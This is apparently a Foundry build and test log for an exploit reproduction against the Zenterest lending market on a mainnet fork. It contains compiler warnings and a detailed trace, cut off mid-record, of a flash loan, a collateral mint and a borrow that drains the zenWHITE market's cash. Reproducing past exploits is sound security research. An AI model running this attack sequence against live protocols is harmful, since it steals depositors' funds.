Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.17s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-08/Zenterest_exp.sol:13:5:
   |
13 |     Uni_Pair_V3 Pool = Uni_Pair_V3(0xC5c134A1f112efA96003f8559Dba6fAC0BA77692);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2487:1:
     |
2487 | interface Pool {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-08/Zenterest_exp.sol:36:51:
   |
36 |     function uniswapV3FlashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
   |                                                   ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-08/Zenterest_exp.sol:36:65:
   |
36 |     function uniswapV3FlashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
   |                                                                 ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 499.24ms (1.94ms CPU time)

Ran 1 test for src/test/2024-08/Zenterest_exp.sol:ContractTest
[PASS] testExploit() (gas: 606555)
Traces:
  [20800] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 20541639 [2.054e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WHITE: [0x5F0E628B693018f639D10e4A4F59BD4d8B2B6B44], "WHITE")
    │   └─ ← [Return]
    ├─ [0] VM::label(MPH: [0x8888801aF4d980682e47f1A9036e589479e835C5], "MPH")
    │   └─ ← [Return]
    ├─ [0] VM::label(Pool: [0xC5c134A1f112efA96003f8559Dba6fAC0BA77692], "Pool")
    │   └─ ← [Return]
    ├─ [0] VM::label(unitroller: [0x606246e9EF6C70DCb6CEE42136cd06D127E2B7C7], "unitroller")
    │   └─ ← [Return]
    ├─ [0] VM::label(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], "zenWHITE")
    │   └─ ← [Return]
    ├─ [0] VM::label(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], "zenMPH")
    │   └─ ← [Return]
    └─ ← [Stop]

  [664355] ContractTest::testExploit()
    ├─ [0] VM::prank(0x90744C976F69c7d112E8Fe85c750ACe2a2c16f15)
    │   └─ ← [Return]
    ├─ [29996] MPH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 23200000000000000000000 [2.32e22])
    │   ├─ emit Transfer(from: 0x90744C976F69c7d112E8Fe85c750ACe2a2c16f15, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 23200000000000000000000 [2.32e22])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000004e9acad5921c6800000
    │   │   @ 0xa1a66bfb4d33891c5758f8aff9dd5fc08e7a901e4c07c2518f79ac2a9d8cab1f: 0x0000000000000000000000000000000000000000000004e9acad5921c6800000 → 0
    │   └─ ← [Return] true
    ├─ [617422] Pool::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 85000000000000000000 [8.5e19], 0, 0x)
    │   ├─ [2467] WHITE::balanceOf(Pool: [0xC5c134A1f112efA96003f8559Dba6fAC0BA77692]) [staticcall]
    │   │   └─ ← [Return] 2857932458550351828128 [2.857e21]
    │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Pool: [0xC5c134A1f112efA96003f8559Dba6fAC0BA77692]) [staticcall]
    │   │   └─ ← [Return] 8783201251326246893244 [8.783e21]
    │   ├─ [28067] WHITE::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 85000000000000000000 [8.5e19])
    │   │   ├─ emit Transfer(from: Pool: [0xC5c134A1f112efA96003f8559Dba6fAC0BA77692], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 85000000000000000000 [8.5e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000049b9ca9a694340000
    │   │   │   @ 0x3a768e09a025c9bf1bba0b8645794762db67f84a9e1424422b9be262e8ea6d53: 0x00000000000000000000000000000000000000000000009aedc7bd13908314a0 → 0x000000000000000000000000000000000000000000000096522b136cfc4f14a0
    │   │   └─ ← [Return] true
    │   ├─ [556164] ContractTest::uniswapV3FlashCallback(8500000000000000 [8.5e15], 0, 0x)
    │   │   ├─ [76842] unitroller::enterMarkets([0x4dD6D5D861EDcD361455b330fa28c4C9817dA687])
    │   │   │   ├─ [71641] 0x94e388d6410A40C36cde41A7AD8e60A820B5971a::enterMarkets([0x4dD6D5D861EDcD361455b330fa28c4C9817dA687]) [delegatecall]
    │   │   │   │   ├─ emit MarketEntered(rToken: zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], account: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0cf: 0 → 0x0000000000000000000000004dd6d5d861edcd361455b330fa28c4c9817da687
    │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 1
    │   │   │   │   │   @ 0x1e311b00d712d68b1829d2099ef73d0e3f49020c7f471ab3c4cd1f50da7e2949: 0 → 1
    │   │   │   │   └─ ← [Return] [0]
    │   │   │   └─ ← [Return] [0]
    │   │   ├─ [24562] MPH::approve(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0cc1a31ed90236c479549f6813e4da882a46840a68063ad6201d9e0f24cd20a3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [8096] MPH::transfer(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], 2000000000000000000000 [2e21])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], value: 2000000000000000000000 [2e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000004e9acad5921c6800000 → 0x00000000000000000000000000000000000000000000047d4119fd9609400000
    │   │   │   │   @ 0xd5f6fafcfe719e1000531e7985d3327cd5448ac354ef4ef592ea27645c71cdc5: 0x0000000000000000000000000000000000000000000000070f69744b9130e572 → 0x0000000000000000000000000000000000000000000000737afccfd74e70e572
    │   │   │   └─ ← [Return] true
    │   │   ├─ [144274] zenMPH::mint(21200000000000000000000 [2.12e22])
    │   │   │   ├─ [556] MPH::balanceOf(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687]) [staticcall]
    │   │   │   │   └─ ← [Return] 2130237755166997669234 [2.13e21]
    │   │   │   ├─ [10708] 0x80De5040D956DD5C367ec96007a94B466A90e993::getBorrowRate(2130237755166997669234 [2.13e21], 13727872740358540479927 [1.372e22], 9099862609485483779018 [9.099e21]) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000041fe886bbf2
    │   │   │   ├─ emit AccrueInterest(cashPrior: 2130237755166997669234 [2.13e21], interestAccumulated: 363551936324124492992751 [3.635e23], borrowIndex: 293358035573459765971 [2.933e20], totalBorrows: 377279809064483033472678 [3.772e23])
    │   │   │   ├─ [45072] unitroller::mintAllowed(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 21200000000000000000000 [2.12e22])
    │   │   │   │   ├─ [44392] 0x94e388d6410A40C36cde41A7AD8e60A820B5971a::mintAllowed(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 21200000000000000000000 [2.12e22]) [delegatecall]
    │   │   │   │   │   ├─ [2553] zenMPH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ emit DistributedSupplierComp(param0: zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 518829395491649734500035689431620112869576930979 [5.188e47])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8134b01afaca53cf534d87ac468393df72a2d3cf1046f8d7720e5501b1979408: 0x00f57e3800000000000000005ae11d5e9a399dee62469ea033bb6c0130c3f6a3 → 0x013970c700000000000000005ae11d5e9a399dee62469ea033bb6c0130c3f6a3
    │   │   │   │   │   │   @ 0x94a6c63c195ff6392a7fc7ed6f1d8057713091e7c352a2760dfaaaa93b0da8fb: 0 → 0x0000000000000000000000005ae11d5e9a399dee62469ea033bb6c0130c3f6a3
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [556] MPH::balanceOf(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687]) [staticcall]
    │   │   │   │   └─ ← [Return] 2130237755166997669234 [2.13e21]
    │   │   │   ├─ [556] MPH::balanceOf(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687]) [staticcall]
    │   │   │   │   └─ ← [Return] 2130237755166997669234 [2.13e21]
    │   │   │   ├─ [6059] MPH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], 21200000000000000000000 [2.12e22])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], value: 21200000000000000000000 [2.12e22])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], value: 115792089237316195423570985008687907853269984665640564018257584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000047d4119fd9609400000 → 0
    │   │   │   │   │   @ 0x0cc1a31ed90236c479549f6813e4da882a46840a68063ad6201d9e0f24cd20a3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffb82bee60269f6bfffff
    │   │   │   │   │   @ 0xd5f6fafcfe719e1000531e7985d3327cd5448ac354ef4ef592ea27645c71cdc5: 0x0000000000000000000000000000000000000000000000737afccfd74e70e572 → 0x0000000000000000000000000000000000000000000004f0bc16cd6d57b0e572
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [556] MPH::balanceOf(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687]) [staticcall]
    │   │   │   │   └─ ← [Return] 23330237755166997669234 [2.333e22]
    │   │   │   ├─ emit Mint(minter: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], mintAmount: 21200000000000000000000 [2.12e22], mintTokens: 751165871214 [7.511e11])
    │   │   │   ├─ emit Transfer(from: zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 751165871214 [7.511e11])
    │   │   │   ├─ [1038] unitroller::mintVerify(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 21200000000000000000000 [2.12e22], 751165871214 [7.511e11])
    │   │   │   │   ├─ [425] 0x94e388d6410A40C36cde41A7AD8e60A820B5971a::mintVerify(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 21200000000000000000000 [2.12e22], 751165871214 [7.511e11]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000001ed4df65e304970a3ca → 0x000000000000000000000000000000000000000000004736acedc9a92a5e596d
    │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000002e8308143f8170fcdb7 → 0x000000000000000000000000000000000000000000004fe46122660c9f345ea6
    │   │   │   │   @ 0x0cc1a31ed90236c479549f6813e4da882a46840a68063ad6201d9e0f24cd20a3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffb82bee60269f6bfffff
    │   │   │   │   @ 13: 0x00000000000000000000000000000000000000000000000000000163acb0bc2b → 0x0000000000000000000000000000000000000000000000000000021291aa5099
    │   │   │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 0 → 0x000000000000000000000000000000000000000000000000000000aee4f9946e
    │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000000e05627 → 0x00000000000000000000000000000000000000000000000000000000013970c7
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000942294844a51e273 → 0x00000000000000000000000000000000000000000000000fe7291b139a79cad3
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [467] WHITE::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 85000000000000000000 [8.5e19]
    │   │   ├─ [8167] WHITE::transfer(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], 85000000000000000000 [8.5e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], value: 85000000000000000000 [8.5e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x2947f22556031d35a2cc8c5e697ccc9558114c10cddc36cd4b1bdba284e6b34e: 0x0000000000000000000000000000000000000000000000004422387ce199a020 → 0x000000000000000000000000000000000000000000000004dfbee22375cda020
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000049b9ca9a694340000 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [36082] zenWHITE::accrueInterest()
    │   │   │   ├─ [467] WHITE::balanceOf(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa]) [staticcall]
    │   │   │   │   └─ ← [Return] 89909548652799303712 [8.99e19]
    │   │   │   ├─ [2708] 0x80De5040D956DD5C367ec96007a94B466A90e993::getBorrowRate(89909548652799303712 [8.99e19], 1527196719891618044551 [1.527e21], 904050326548776043426 [9.04e20]) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000047bad3bfbe7
    │   │   │   ├─ emit AccrueInterest(cashPrior: 89909548652799303712 [8.99e19], interestAccumulated: 44669194037861804814844 [4.466e22], borrowIndex: 293702201847555535997 [2.937e20], totalBorrows: 46196390757753422859395 [4.619e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000086bedb59f4bac709 → 0x00000000000000000000000000000000000000000000000febefd47ab99fb47d
    │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000052ca1cad4e71a19a87 → 0x0000000000000000000000000000000000000000000009c84fb55b35674fcc83
    │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000000dee5d4 → 0x00000000000000000000000000000000000000000000000000000000013970c7
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000310237f621d7b143a2 → 0x0000000000000000000000000000000000000000000008b460daf90b4e67a3d1
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [467] WHITE::balanceOf(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa]) [staticcall]
    │   │   │   └─ ← [Return] 89909548652799303712 [8.99e19]
    │   │   ├─ [226175] zenWHITE::borrow(89909548652799303712 [8.99e19])
    │   │   │   ├─ [145356] unitroller::borrowAllowed(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 89909548652799303712 [8.99e19])
    │   │   │   │   ├─ [144676] 0x94e388d6410A40C36cde41A7AD8e60A820B5971a::borrowAllowed(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 89909548652799303712 [8.99e19]) [delegatecall]
    │   │   │   │   │   ├─ emit MarketEntered(rToken: zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], account: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [9078] 0x47D748C9BAbD5cCa642F9f98e07442C0B5b04d2f::getUnderlyingPrice(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa]) [staticcall]
    │   │   │   │   │   │   ├─ [3056] zenWHITE::symbol() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] "zenWHITE"
    │   │   │   │   │   │   ├─ [426] zenWHITE::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] WHITE: [0x5F0E628B693018f639D10e4A4F59BD4d8B2B6B44]
    │   │   │   │   │   │   └─ ← [Return] 66570137662599764 [6.657e16]
    │   │   │   │   │   ├─ [5667] zenMPH::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [556] MPH::balanceOf(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 23330237755166997669234 [2.333e22]
    │   │   │   │   │   │   └─ ← [Return] 0, 751165871214 [7.511e11], 0, 28222794475109390118782771529 [2.822e28]
    │   │   │   │   │   ├─ [9078] 0x47D748C9BAbD5cCa642F9f98e07442C0B5b04d2f::getUnderlyingPrice(zenMPH: [0x4dD6D5D861EDcD361455b330fa28c4C9817dA687]) [staticcall]
    │   │   │   │   │   │   ├─ [3056] zenMPH::symbol() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] "zenMPH"
    │   │   │   │   │   │   ├─ [426] zenMPH::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] MPH: [0x8888801aF4d980682e47f1A9036e589479e835C5]
    │   │   │   │   │   │   └─ ← [Return] 944836858607953 [9.448e14]
    │   │   │   │   │   ├─ [9578] zenWHITE::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [467] WHITE::balanceOf(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 89909548652799303712 [8.99e19]
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 26204447932880747707996955515 [2.62e28]
    │   │   │   │   │   ├─ [5078] 0x47D748C9BAbD5cCa642F9f98e07442C0B5b04d2f::getUnderlyingPrice(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa]) [staticcall]
    │   │   │   │   │   │   ├─ [1056] zenWHITE::symbol() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] "zenWHITE"
    │   │   │   │   │   │   ├─ [426] zenWHITE::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] WHITE: [0x5F0E628B693018f639D10e4A4F59BD4d8B2B6B44]
    │   │   │   │   │   │   └─ ← [Return] 66570137662599764 [6.657e16]
    │   │   │   │   │   ├─ [365] zenWHITE::borrowIndex() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 293702201847555535997 [2.937e20]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0d0: 0 → 0x000000000000000000000000e3334e66634acf17b2b97ab560ec92d6861b25fa
    │   │   │   │   │   │   @ 0xc01e95ad16df4af73aeed4e5fb90f920851bbaddd7ab1071a075b09d7e798cfe: 0 → 1
    │   │   │   │   │   │   @ 0x18e5f29c2c060d5023f67f4ce0ea6ac52568e1a05a1b57041a61b88066ae3d84: 0x00ddee5400000000000000000000013d02435f589721ac64f24ac39828c3726c → 0x013970c700000000000000000000013d02435f589721ac64f24ac39828c3726c
    │   │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 1 → 2
    │   │   │   │   │   │   @ 0x74cdc031d729c1fae31b0daa150c7e8cec9eeb05c5b4845c95961fd2ff5de78b: 0 → 0x0000000000000000000000000000013d02435f589721ac64f24ac39828c3726c
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [467] WHITE::balanceOf(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa]) [staticcall]
    │   │   │   │   └─ ← [Return] 89909548652799303712 [8.99e19]
    │   │   │   ├─ [23267] WHITE::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 89909548652799303712 [8.99e19])
    │   │   │   │   ├─ emit Transfer(from: zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 89909548652799303712 [8.99e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2947f22556031d35a2cc8c5e697ccc9558114c10cddc36cd4b1bdba284e6b34e: 0x000000000000000000000000000000000000000000000004dfbee22375cda020 → 0
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000004dfbee22375cda020
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Borrow(borrower: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 89909548652799303712 [8.99e19], accountBorrows: 89909548652799303712 [8.99e19], totalBorrows: 46286300306406222163107 [4.628e22])
    │   │   │   ├─ [983] unitroller::borrowVerify(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 89909548652799303712 [8.99e19])
    │   │   │   │   ├─ [376] 0x94e388d6410A40C36cde41A7AD8e60A820B5971a::borrowVerify(zenWHITE: [0xE3334e66634acF17B2b97ab560ec92D6861b25fa], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 89909548652799303712 [8.99e19]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x74cdc031d729c1fae31b0daa150c7e8cec9eeb05c5b4845c95961fd2ff5de78b: 0 → 0x0000000000000000000000000000013d02435f589721ac64f24ac39828c3726c
    │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x000000000000000000000000000000000000000000000004dfbee22375cda020
    │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000009c84fb55b35674fcc83 → 0x0000000000000000000000000000000000000000000009cd2f743d58dd1d6ca3
    │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x00000000000000000000000000000000000000000000000febefd47ab99fb47d
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [3367] WHITE::transfer(Pool: [0xC5c134A1f112efA96003f8559Dba6fAC0BA77692], 85008500000000000000 [8.5e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pool: [0xC5c134A1f112efA96003f8559Dba6fAC0BA77692], value: 85008500000000000000 [8.5e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3a768e09a025c9bf1bba0b8645794762db67f84a9e1424422b9be262e8ea6d53: 0x000000000000000000000000000000000000000000000096522b136cfc4f14a0 → 0x00000000000000000000000000000000000000000000009aede5efc8091a54a0
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000004dfbee22375cda020 → 0x000000000000000000000000000000000000000000000000440405c869026020
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0 → 1
    │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0cf: 0 → 0x0000000000000000000000004dd6d5d861edcd361455b330fa28c4c9817da687
    │   │   │   @ 0xd5f6fafcfe719e1000531e7985d3327cd5448ac354ef4ef592ea27645c71cdc5: 0x0000000000000000000000000000000000000000000000070f69744b9130e572 → 0x0000000000000000000000000000000000000000000000737afccfd74e70e572
    │   │   │   @ 0x2947f22556031d35a2cc8c5e697ccc9558114c10cddc36cd4b1bdba284e6b34e: 0x0000000000000000000000000000000000000000000000004422387ce199a020 → 0x000000000000000000000000000000000000000000000004dfbee22375cda020
    │   │   │   @ 0x0cc1a31ed90236c479549f6813e4da882a46840a68063ad6201d9e0f24cd20a3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000310237f621d7b143a2 → 0x0000000000000000000000000000000000000000000008b460daf90b4e67a3d1
    │   │   └─ ← [Stop]
    │   ├─ [467] WHITE::balanceOf(Pool: [0xC5c134A1f112efA96003f8559Dba6fAC0BA77692]) [staticcall]
